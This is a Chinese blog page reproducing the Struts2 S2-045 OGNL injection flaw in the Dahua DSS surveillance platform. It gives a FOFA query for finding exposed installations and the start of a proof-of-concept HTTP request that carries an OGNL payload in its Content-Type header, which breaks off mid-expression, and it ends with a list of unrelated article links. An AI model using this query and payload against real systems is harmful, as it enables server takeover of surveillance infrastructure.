当前位置: 首页 > news >正文

大华DSS S2-045 OGNL表达式注入漏洞复现

0x01 产品简介

 大华DSS安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。

0x02 漏洞概述

 大华DSS安防监控系统平台采用ApacheStruts2作为网站应用框架。由于应用程序框架存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权限。

0x03 复现环境

FOFA:

body="/portal/include/script/dahuaDefined/headCommon.js?type=index" && title="DSS"

0x04 漏洞复现

PoC

POST /admin/login_login.action HTTP/1.1
Host: your-ip
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container
http://www.lryc.cn/news/255592.html

相关文章:

  • 大数据之HBase(二)
  • 前后端数据传输格式(下)
  • mysql pxc高可用离线部署(三)
  • XXL-JOB 日志表和日志文件自动清理
  • 常用sql记录
  • 设备温度和振动综合监测:温振一体式传感器的优点和应用
  • 彻底解决ModuleNotFoundError: No module named ‘exceptions‘【Bug完美解决】
  • yarn和npm的区别
  • 设计图中时序图
  • 反射实现tomcat
  • Ubuntu 安装 CUDA 和 cuDNN 详细步骤
  • ArkTS快速入门
  • HTTP不同场景下的通信过程和用户上网认证过程分析
  • VR 实现 Splash Screen 效果
  • HarmonyOS学习--TypeScript语言学习(一)
  • 【C语言】函数递归详解(一)
  • WT588F02B-8S语音芯片助力破壁机:智能声音播放提示IC引领健康生活新潮流
  • NXP iMX8M Plus Qt5 双屏显示
  • RepidJson中Writer类、FilewriteStream类、 PrettyWriter类的区别
  • IntelliJ idea卡顿解决,我遇到的比较管用的方案
  • Fabric.js 实战开发使用介绍
  • Vue.directive
  • webpack优化打包速度
  • ALTERNET STUDIO 9.1 Crack
  • 基于Java技术的选课管理系统设计与实现
  • 在UBUNTU上使用Qemu和systemd-nspawn搭建RISC-V轻量级用户模式开发环境
  • JAVA使用POI向doc加入图片
  • 反向传播算法
  • 记录 | ubuntu降低内核版本的方法
  • MX6ULL学习笔记 (八) platform 设备驱动实验